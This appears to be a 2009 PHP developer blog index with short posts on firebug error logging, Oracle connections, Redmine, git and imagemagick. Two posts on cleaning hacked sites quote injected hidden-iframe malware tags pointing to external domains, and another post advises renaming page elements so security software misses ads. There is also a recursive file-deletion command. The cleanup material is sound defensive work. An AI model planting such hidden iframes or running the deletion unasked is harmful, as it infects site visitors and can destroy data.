Why will java never reach PHP in web development

By pavic | June 4, 2009

Few days ago I started analyzing “tapestry” framework as part of my academic education.

When you visit tapestry’s website, there is

Actually I don’t think it’s worth spending my time writing about it.

If you want to start learning web development, start with PHP, make hello world than try to do the same with tapestry.

Topics: PHP | No Comments »

Updated PHP attack script scanner

By pavic | May 7, 2009

Recently I stumbled upon this codes:


<iframe src="http://clifedo.net/?click=AS09SD" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

and same code as echo in php

So I have added them to my php malicious code remover.

You can grab it from here, and run it above your /www folder.

Read here whole post about it.

Topics: PHP | No Comments »

Ads blocked by firewall?

By pavic | May 3, 2009

Here is a my small-research article on
“How to avoid having ads from your website blocked by firewalls.”

Today many people install firewalls, and various security suites in order to protect themselves from very dangerous and highly contagious Trojans, viruses and worms spread in the wild on the Internet.

Such software on client machine might block advertisements or even some promotional material relevant for the user on your website without begin noticed by user.

Here is how project’s website looks like with advertisements automatically removed by “Outpost security suite”,

problem with know what...

So, it appears that agitinum searches for keywords in DOM tree of your browser, and based on keywords it decides weather it should or should not load content of that particular DOM element, including http requests required to fetch content (iframe, image or flash…).

Solution for this kind of AD protection is easy, just don’t use some of this keywords in your HTML and filenames of images you want to display:
ad, advertisement, promo, reclam, adv, banner, etc…

And here is how should the target page look like:

solution for this article...

If you don’t see the image below this text, that means you have some advertisement software blocking it, and displaying AD or some other text instead.

Topics: PHP | No Comments »

Using firebug to display php errors

By pavic | April 29, 2009

Here is usable code which will display php errors in your firebug’s console.

Download code and example here.

View example here. (You need to have firebug enabled).

Here is how it looks like
Screenshot of firebug dumping php errors
Just add this code to your php script, or include it, and look for errors in console.


set_error_handler('firebug_error_handler', E_ALL);

function firebug_error_handler($errno, $err_txt, $err_file, $err_line) {
$err_file=addslashes($err_file);
switch ($errno) {
case E_USER_ERROR:
$out = <<
EOL;
print $out;
exit(1);
break;
case E_USER_WARNING:
$out = <<
EOL;
print $out;
break;
case E_USER_NOTICE:
$out = <<
EOL;
print $out;
break;
default:
$out = <<
EOL;
print $out;
break;
}
}

and here is a test code

// function to test the error handling
function scale_by_log($vect, $scale)
{
if (!is_numeric($scale) || $scale <= 0) {
trigger_error("log(x) for x <= 0 is undefined, you used: scale = $scale", E_USER_ERROR);
}

if (!is_array($vect)) {
trigger_error("Incorrect input vector, array of values expected", E_USER_WARNING);
return null;
}

for ($i=0; $i if (!is_numeric($vect[$i]))
trigger_error("Value at position $i is not a number, using 0 (zero)", E_USER_NOTICE);
$temp[$i] = log($scale) * $vect[$i];
}
return $temp;
}

// set to the user defined error handler
$old_error_handler = set_error_handler("myErrorHandler");

// trigger some errors, first define a mixed array with a non-numeric item
echo "vector a\n";
$a = array(2,3, "foo", 5.5, 43.3, 21.11);
print_r($a);

// now generate second array, generating a warning
echo "----\nvector b - a warning (b = log(PI) * a)\n";
$b = scale_by_log($a, M_PI);
print_r($b);

// this is trouble, we pass a string instead of an array
echo "----\nvector c - an error\n";
$c = scale_by_log("not array", 2.3);
var_dump($c);

// this is a critical error, log of zero or negative number is undefined
echo "----\nvector d - fatal error\n";
$d = scale_by_log($a, -2.5);

Topics: PHP | No Comments »

how to test is variable even/odd in a loop and how to alternate row colors in table

By pavic | April 23, 2009

In my history as a developer, I’ve stumbled upon various ways of even/odd testing for variables.

Even/odd testing has many usages, one of them is for alternating row colors in a table.

This particular case is very useful in a for loop, and much faster than conventional mod calculation.

Here is PHP code example, with comments for each line:

//initialise value
$even = true;
for($i=0;$i<11;$i++) {
//this line is only to format string
(($even)?($evod ="even"):($evod = "odd"));
//outputs even/odd
print ($i . "-" . $evod . "
“);
//performs even/odd calculation!
$even = !$even;
}

Topics: PHP, javascript | No Comments »

connecting to oracle from php

By pavic | April 21, 2009

I had problems connecting to oracle database on remote machine in lan from my workstation.

So, after a few hours of googling, testing and consulting with colegues, here are detailed instructions and solution to 2 common connection problems it’s:
ORA-12545: Connect failed because target host or object does not exist

TNS problems:
ORA-12154: TNS:could not resolve the connect identifier and
ORA-12514: TNS:listener does not currently know of service requested in connect descriptor

and NLS problem
ORA-12705: Cannot access NLS data files or invalid environment

There is a several ways to connect to oracle from php.

First, follow this tutorial, it’s nicely explained to fit your enviroment:
http://www.oracle.com/technology/pub/notes/technote_php_instant.html

Then, make sure you have oracle installed and visible via phpinfo();

Try to connect to your test database, as explained in http://www.orafaq.com/wiki/PHP_FAQ

If you get ORA-12514: TNS:listener does not currently know of service requested in connect descriptor or ORA-12154: TNS:could not resolve the connect identifier than you need to create a file named:
tnsnames.ora in your ORACLE_HOME directory.

Your ORACLE_HOME directory should be set in registry or in ENV if it’s not existing, despite what tutorial says that you don’t need it. For some versions of oracle, you do…

tnsnames.ora should have connection informations regarding connections you are going to use from your PHP app
[visible_from_php_resource_identifier] =
(DESCRIPTION =
(ADDRESS =
(PROTOCOL = TCP)
(HOST = [hostname_of_your_db])
(PORT = 1521)
)
(CONNECT_DATA =
(SID = [your_oracle_sid])
)
)

Variables in [] have to be replaced, other variables might have to be replaced, depending on your installation.

Also set TNS_ADMIN system variable to point to your ORACLE_HOME

Try to connect again.

If it fails, here are 2 methods that I made working, by playing with variables specified above:

Note: 1rst method won’t give you correct information, if you get some of TNS errors, they might be related to ORA-12705: Cannot access NLS data files or invalid environment error. so make sure you don’t have NLS_LANG in your registry under local machine->software->oracle if it’s defined, rename it to xNLS_LANG for example.

Make sure to restart your server after modifying any of mentioned variables.

Here is a nifty php code wich will determine how your enviroment variables look alike:
foreach (array('PATH', 'NLS_LANG', 'NLS_NCHAR', 'ORACLE_HOME', 'TNS_ADMIN') as $env)
{
print $env;

if (isset($_ENV[$env]))
{
print ‘=’ . htmlspecialchars($_ENV[$env]);
}
else
{
print ‘ not set’;
}

print ‘
‘;
}

and my output looks like this:
PATH not set
NLS_LANG not set
NLS_NCHAR not set
ORACLE_HOME=C:\JP\oracle\instantclient_11_1
TNS_ADMIN=C:\JP\oracle\instantclient_11_1\

here are functions that i used to test my oracle connection:
if ($c = oci_connect("$user", "$pass", "$TNS_NAME")) {
echo "Successfully connected to Oracle.n";
oci_close($c);
} else {
$err = oci_error();
echo "Oracle Connect Error " . $err['text'];
}
 and
$db = "(DESCRIPTION = (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = $host)(PORT = 1521)) ) (CONNECT_DATA = (SID = $sid) ) )";
$con = OCILogOn("$user", "pass",$db);
var_dump ($con);
var dump should say:
resource(2) of type (oci8 connection)

Topics: PHP | No Comments »

Has your website beign blocked by google

By pavic | April 17, 2009

or your antivirus blocks access to it.
Antivirus detects malicious code from website
It’s most likely that someone has really hacked to your webserver and actually hacked in your site’s code.
Adding lines of code that are intended to infect client machine of your website’s visitor.

So if your website has been blocked by google or your local antivirus software has detected some malware in your site, or prevented access to it, here is what you should do:

1. FTP to yor site, grab it back to your computer, search for lines code provided below, and upload it back to your web server
2. Submit your site for re-testing by google.

Here is a code you should search for:
<iframe src=\”http://xtrarobotz.com/?click=7B934CB\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>

and

<iframe src=\”http://goooogleadsence.biz/?click=176CCDA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>

If you have ssh access to your webserver, you can use this command:
find . | xargs grep -s goooogleadsence.biz
and
find . | xargs grep -s xtrarobotz.com

from your www root , which will dump a list of files containing that malicious strings.

Here is a nifty php script
written by my ingeniosity which will recurse trough your subdirs and remove
malicious tags. Please open the script and edit the $dir = “www” setting to fit your

So, steps to recursively remove malicious code from whole www structure would be:

  1. Upload scandir.php to your ftp root
  2. Login via ssh
  3. Run some of find/grep commands find . | xargs grep -s goooogleadsence.biz
  4. Run php -f scandir.php
  5. Run find/grep again to make sure only scandir.php stays listed with malicious code
  6. Delete scandir.php from your server!

That should be it, took me quite some time to write scandir.php script.

Also, if you have some antivirus software serverside installed, run it to scan trough your website/sites…

I had clamwin, but did not detect anything…

Btw, here is a nifty linux command to remove 0 byte files from your server (might be dangerous)
find /whatever/path/ -size 0 -exec rm {} \;

Topics: PHP | 1 Comment »

Installing redmine on site5

By pavic | April 16, 2009

This is a quick tutorial aimed to help newbies install redmine project management tool to site5 shared hosting.

  1. login via ssh to your site5 account
  2. mkdir /redmine to your ~/www
  3. checkout redime like this svn co http://redmine.rubyforge.org/svn/tags/0.8.3/ ~/www/redmine
  4. follow instructions from http://www.redmine.org/wiki/redmine/RedmineInstall
  5. rename ~/www/redmine/public/deploy.fcgi.example to deploy.fcgi
  6. add ENV['GEM_PATH'] = ‘/home//.gem/ruby/1.8/gems:/home//.gem/ruby/1.8′

That should do the trick, if you failed to install redime that way, buzz me, so I can make this tutorial better!

Topics: PHP | No Comments »

migrating from svn to git

By pavic | March 21, 2009

I’m still a newb in GIT, but I’m veteran in version control systems.
So, if you are TortoiseSVN user like I am, probably best thing for you would be to start working in torotise like environment with some additional features like easy ignoring, easy renaming, and easy moving files. All of those features exists in tortoise, but

Reasons for switching to git:

  1. it does not add .git to each subfolder
  2. it probably manages ignores better
  3. it’s much faster than svn
  4. supposingly it has smarter merging algorhytms
  5. it makes project branching much easier
  6. has full local copy of respository (making browsing and reverting much faster)

here are few links you might wanna visit if you want to spare some time googling for git:
Git Shell extension like Tortoise
http://code.google.com/p/gitextensions/

Standalone git app
http://code.google.com/p/msysgit/

there is another link http://sourceforge.net/projects/gitextensions/ but it’s just another link for git shell extension

Topics: PHP | No Comments »

rounded borders with transparent shadow using imagemagick

By pavic | March 13, 2009

I was in a need for 3px rounded white borders with semi-transparent PNG shadow.

I know such images are not natively supported in IE6, but, checkout my noie6 plugin :D

So if you are in a need to for example have your users upload jpg image, and you are building thumbnails etc from it, here is a good bat file (windows) which calls imagemagick to achive that.

I’ve called that .bat file “zikaborder” due to our designer’s nick zika.

so you have image like:
cave

and after calling zikadizajner filename (no extension)
cave after imagemagick
this gets generated.

For this to work, you need to download and install imagemagick from xx site and add it to your path.

Topics: PHP | No Comments »

« Previous Entries